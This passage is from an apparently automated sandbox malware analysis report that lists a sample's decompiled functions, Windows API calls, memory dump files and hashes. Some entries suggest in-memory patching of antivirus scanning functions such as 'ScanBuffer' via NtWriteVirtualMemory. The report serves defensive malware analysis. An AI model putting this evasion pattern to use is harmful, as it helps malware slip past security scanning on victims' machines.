                                                                                                                  Function 02B25C2C Relevance: 4.6, APIs: 3, Instructions: 105fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CreateFileA.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25C88
                                                                                                                  • GetLastError.KERNEL32(00000000,C0000000,00000000,00000000,00000002,00000080,00000000,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25CB6
                                                                                                                    • Part of subcall function 02B17D5C: CreateFileA.KERNEL32(00000000,00000000,00000000,00000000,00000003,00000080,00000000,?,?,02B23900,02B25CF6,00000000,02B25D74,?,?,02B23900), ref: 02B17DAA
                                                                                                                    • Part of subcall function 02B17F98: GetFullPathNameA.KERNEL32(00000000,00000104,?,?,?,02B23900,02B25D11,00000000,02B25D74,?,?,02B23900,00000001), ref: 02B17FB7
                                                                                                                  • GetLastError.KERNEL32(00000000,02B25D74,?,?,02B23900,00000001), ref: 02B25D1B
                                                                                                                    • Part of subcall function 02B1A778: FormatMessageA.KERNEL32(00003200,00000000,?,00000000,?,00000100,00000000,?,02B1C3D9,00000000,02B1C433), ref: 02B1A797
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CreateErrorFileLast$FormatFullMessageNamePath
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 503785936-0
                                                                                                                  • Opcode ID: 13e7a98b733bdc4edb4e1f54af0d21bdd78b6129ac47c76101a7bdc9c9f69107
                                                                                                                  • Instruction ID: ff635de6bcd77280b2ddfe74b3658f7c21120d0ea72a1db5e3dac4963f45e944
                                                                                                                  • Opcode Fuzzy Hash: 13e7a98b733bdc4edb4e1f54af0d21bdd78b6129ac47c76101a7bdc9c9f69107
                                                                                                                  • Instruction Fuzzy Hash: 52319570E007189FDB10EFA4C945BDEBBF6AF09700FD041A5E504AB390DB756A058FA1
                                                                                                                  Function 02B2F212 Relevance: 4.6, APIs: 3, Instructions: 59registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
                                                                                                                  • RegSetValueExA.ADVAPI32(0000086C,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
                                                                                                                  • RegCloseKey.ADVAPI32(0000086C,0000086C,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 779948276-0
                                                                                                                  • Opcode ID: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
                                                                                                                  • Instruction ID: aaf8704048b86ca2001737db9a699a66b180aaff3b6f120fedb44d426fd9641c
                                                                                                                  • Opcode Fuzzy Hash: f7ac8511ed67d9011d622b1fb37030d9d1624884c990d6728317bfabeb952f58
                                                                                                                  • Instruction Fuzzy Hash: 8E110AB1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54
                                                                                                                  Function 02B2F214 Relevance: 4.6, APIs: 3, Instructions: 58registryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • RegOpenKeyA.ADVAPI32(?,00000000,02C8BA58), ref: 02B2F258
                                                                                                                  • RegSetValueExA.ADVAPI32(0000086C,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F290
                                                                                                                  • RegCloseKey.ADVAPI32(0000086C,0000086C,00000000,00000000,00000001,00000000,0000001C,00000000,02B2F2C3), ref: 02B2F29B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: CloseOpenValue
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 779948276-0
                                                                                                                  • Opcode ID: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
                                                                                                                  • Instruction ID: c583a64b6425cf91fa3f8dd343c2bc0a43ac95fed810b29f680252759cda958d
                                                                                                                  • Opcode Fuzzy Hash: 7ee005d2cb1d7f3d4e43fee173dcea621e64e743096c6e28576a293a07628b1c
                                                                                                                  • Instruction Fuzzy Hash: 201106B1A40208AFEB00EFA8DD81E9E7BFDEB09740B9045A1B614D7655EB30EE448F54
                                                                                                                  Function 02B1E364 Relevance: 4.5, APIs: 3, Instructions: 45COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: ClearVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1473721057-0
                                                                                                                  • Opcode ID: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                  • Instruction ID: cf62b1e7ffc386619a5091bbe796d19930a87376fbd5c22f54b4b25ff03de1a5
                                                                                                                  • Opcode Fuzzy Hash: a392d9e270fc91b1ba68ab055f0b80df070bc73b3a8ae4f5386a0c57aaab5823
                                                                                                                  • Instruction Fuzzy Hash: B8F09660718110C7DB2A7B39AD8466D379AAF403407D094F6EC07DB155DF64CC85D762
                                                                                                                  Function 02B14D50 Relevance: 4.5, APIs: 3, Instructions: 24memoryCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                  • SysAllocStringLen.OLEAUT32(?,?), ref: 02B14D5B
                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 02B14D6D
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 986138563-0
                                                                                                                  • Opcode ID: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                  • Instruction ID: 52ec3ed92abf5c86fe2e09f386c8718117f591d01557897fc6ce4818e05abfed
                                                                                                                  • Opcode Fuzzy Hash: 3f1784c7bf07cd4297d24ff80a07666f1847e75eafdc0d720cb40ac94caab726
                                                                                                                  • Instruction Fuzzy Hash: 5FE017F82152056EEF186F25DD40B3B373AEFC2741BE484E9A940CA164DB3CD840AE78
                                                                                                                  Function 02B270DC Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 256COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 02B273DA
                                                                                                                  Strings
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeString
                                                                                                                  • String ID: H
                                                                                                                  • API String ID: 3341692771-2852464175
                                                                                                                  • Opcode ID: d562f8fbd8a03faffb50b50b35ad311aae92571410b87af1bc3522e7f2b6c8fc
                                                                                                                  • Instruction ID: 5e3f49abd19516fc57f33f9efe1a41b5da8abe4a2bbc03da43a24512de6c3529
                                                                                                                  • Opcode Fuzzy Hash: d562f8fbd8a03faffb50b50b35ad311aae92571410b87af1bc3522e7f2b6c8fc
                                                                                                                  • Instruction Fuzzy Hash: 8BB1E474A017189FDB14CF99D580A9DFBF2FF89314F2481A9E849AB320DB30A849DF54
                                                                                                                  Function 02B1E760 Relevance: 3.1, APIs: 2, Instructions: 63COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • VariantCopy.OLEAUT32(00000000,00000000), ref: 02B1E781
                                                                                                                    • Part of subcall function 02B1E364: VariantClear.OLEAUT32(?), ref: 02B1E373
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Variant$ClearCopy
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 274517740-0
                                                                                                                  • Opcode ID: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
                                                                                                                  • Instruction ID: 31705c05396b3093132a35808ecb0407729877560101d150f040d0c1827d8464
                                                                                                                  • Opcode Fuzzy Hash: f7f73fb69b99b8f1f15fd7895678d08e9ea309e8c690b8822045bf0443fdd3e2
                                                                                                                  • Instruction Fuzzy Hash: C111C8307102108BE735AF29C8C8A6677DBEF8575079084E6ED4B8F215DB30EC41DB62
                                                                                                                  Function 02B1E3FC Relevance: 1.6, APIs: 1, Instructions: 96COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: InitVariant
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1927566239-0
                                                                                                                  • Opcode ID: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
                                                                                                                  • Instruction ID: aac2e1a7479b28b3d4be163968fb7e115db2a87ac9fdc6a70b521e5dc32b1f5b
                                                                                                                  • Opcode Fuzzy Hash: 9185018459b088728cad0744549f11178f8f9b77ae34eac6703455c8184e4730
                                                                                                                  • Instruction Fuzzy Hash: 38317171A00209AFDB14DFA8D886AAE77F8EB0C304F8844E5FD09D7250D734EA50CBA5
                                                                                                                  Function 02B289D0 Relevance: 1.6, APIs: 1, Instructions: 72COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNEL32(KernelBASE,00000000,00000000,02B2823C,?,?,00000000,?,02B27A7E,ntdll,00000000,00000000,02B27AC3,?,?,00000000), ref: 02B2820A
                                                                                                                    • Part of subcall function 02B281CC: GetModuleHandleA.KERNELBASE(?), ref: 02B2821E
                                                                                                                    • Part of subcall function 02B28274: GetModuleHandleW.KERNEL32(Kernel32,00000000,00000000,02B282FC,?,?,00000000,00000000,?,02B28215,00000000,KernelBASE,00000000,00000000,02B2823C), ref: 02B282C1
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(00000000,Kernel32), ref: 02B282C7
                                                                                                                    • Part of subcall function 02B28274: GetProcAddress.KERNEL32(?,?), ref: 02B282D9
                                                                                                                    • Part of subcall function 02B27D78: NtWriteVirtualMemory.NTDLL(?,?,?,?,?), ref: 02B27DEC
                                                                                                                    • Part of subcall function 02B28338: FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02B283C2), ref: 02B283A4
                                                                                                                  • FreeLibrary.KERNEL32(75380000,00000000,00000000,00000000,00000000,02B9738C,Function_0000662C,00000004,02B9739C,02B9738C,05F5E103,00000040,02B973A0,75380000,00000000,00000000), ref: 02B28AAA
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: HandleModule$AddressProc$CacheFlushFreeInstructionLibraryMemoryVirtualWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 1478290883-0
                                                                                                                  • Opcode ID: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
                                                                                                                  • Instruction ID: 401c5546b03e7ac287ec388b66642f19348bdca534cc7cf9fffcb5614c4529ea
                                                                                                                  • Opcode Fuzzy Hash: 566467167035598960a9aa4e6fea7b2745b7a3bb42487541fa31e889ffbab21b
                                                                                                                  • Instruction Fuzzy Hash: C02157F0694310AFEB00F7B4DD02B9DB7EADB05740F9044E0F608E7190DE749905AA1D
                                                                                                                  Function 02B26D6C Relevance: 1.5, APIs: 1, Instructions: 30COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • CLSIDFromProgID.OLE32(00000000,?,00000000,02B26DB9,?,?,?,00000000), ref: 02B26D99
                                                                                                                    • Part of subcall function 02B14C60: SysFreeString.OLEAUT32(02B2F4A4), ref: 02B14C6E
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FreeFromProgString
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 4225568880-0
                                                                                                                  • Opcode ID: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
                                                                                                                  • Instruction ID: 4a4b92f9f1f1dedc7eb8ea25957ab6f61ee95683d80a25ff4dff7ca629b22b25
                                                                                                                  • Opcode Fuzzy Hash: a8ba14f052f68dc6a97f5c029b4808ed4921915a761b52c31bfeaf625329ede6
                                                                                                                  • Instruction Fuzzy Hash: 4CE0ED7520031CBBE711EB62DC42D8E7BBDDB8A750B9104F1F804A3610EA31AE048860
                                                                                                                  Function 02B15868 Relevance: 1.5, APIs: 1, Instructions: 26COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetModuleFileNameA.KERNEL32(02B10000,?,00000105), ref: 02B15886
                                                                                                                    • Part of subcall function 02B15ACC: GetModuleFileNameA.KERNEL32(00000000,?,00000105,02B10000,02B3E790), ref: 02B15AE8
                                                                                                                    • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B06
                                                                                                                    • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,02B10000,02B3E790), ref: 02B15B24
                                                                                                                    • Part of subcall function 02B15ACC: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 02B15B42
                                                                                                                    • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 02B15B8B
                                                                                                                    • Part of subcall function 02B15ACC: RegQueryValueExA.ADVAPI32(?,02B15D38,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,02B15BD1,?,80000001), ref: 02B15BA9
                                                                                                                    • Part of subcall function 02B15ACC: RegCloseKey.ADVAPI32(?,02B15BD8,00000000,?,?,00000000,02B15BD1,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 02B15BCB
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: Open$FileModuleNameQueryValue$Close
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 2796650324-0
                                                                                                                  • Opcode ID: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                  • Instruction ID: 7c9d9dffa2493a11e4723fb4feeb4da078b4d5d2d69a9d08b4af680170e4844a
                                                                                                                  • Opcode Fuzzy Hash: 450f0b7c147cec959141904987b0b6e2a54cef4eccdf5940c5d91eecae94a061
                                                                                                                  • Instruction Fuzzy Hash: EBE09271A003148FCB20DE9CC8C0B4633D8AF48750F840AA1ED68CF346D7B0D9608BD0
                                                                                                                  Function 02B17DE0 Relevance: 1.5, APIs: 1, Instructions: 23fileCOMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • WriteFile.KERNEL32(?,?,?,?,00000000), ref: 02B17DF4
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: FileWrite
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3934441357-0
                                                                                                                  • Opcode ID: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                  • Instruction ID: d311b245ac91300b6e3f49358a685782d7e933ed16b4da00ed8024326a8731f9
                                                                                                                  • Opcode Fuzzy Hash: d61ce2c3c763b7742acb03e8648b5f8fe395973a28385ba7f431f6bc08d7eb89
                                                                                                                  • Instruction Fuzzy Hash: 16D05BB63091507AE224965A5D44EA75BDCCFC6770F50067DF558C7180D7208C01C671
                                                                                                                  Function 02B17E80 Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02B3356F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanBuffer,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,Initialize), ref: 02B17E8B
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                  • Snapshot File: hcaresult_0_2_2b10000_EPTMAcgvNZ.jbxd
                                                                                                                  Similarity
                                                                                                                  • API ID: AttributesFile
                                                                                                                  • String ID:
                                                                                                                  • API String ID: 3188754299-0
                                                                                                                  • Opcode ID: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                  • Instruction ID: 632a84800eedb7547e335e22df8e8bc69168021fc75e2a83c2b73d2cf3e45fdf
                                                                                                                  • Opcode Fuzzy Hash: afc78bd9077d6c58708d8e6086c771a503970b8d403f064203e8295bf92b6468
                                                                                                                  • Instruction Fuzzy Hash: 2DC08CF32112010E1E60A9BC1CC425963CD8B842347E01EE1E438CB2C9DB1698663820
                                                                                                                  Function 02B17E5C Relevance: 1.5, APIs: 1, Instructions: 16COMMON
                                                                                                                  Download Yara Rule
                                                                                                                  APIs
                                                                                                                  • GetFileAttributesA.KERNEL32(00000000,?,02B3041F,ScanString,02B97380,02B3B7B8,OpenSession,02B97380,02B3B7B8,ScanString,02B97380,02B3B7B8,UacScan,02B97380,02B3B7B8,UacInitialize), ref: 02B17E67
                                                                                                                  Memory Dump Source
                                                                                                                  • Source File: 00000000.00000002.1362438194.0000000002B11000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B10000, based on PE: true
                                                                                                                  • Associated: 00000000.00000002.1359891857.0000000002B10000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1372399400.0000000002B3E000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002B97000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8B000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  • Associated: 00000000.00000002.1375965632.0000000002C8E000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                  Joe Sandbox IDA Plugin
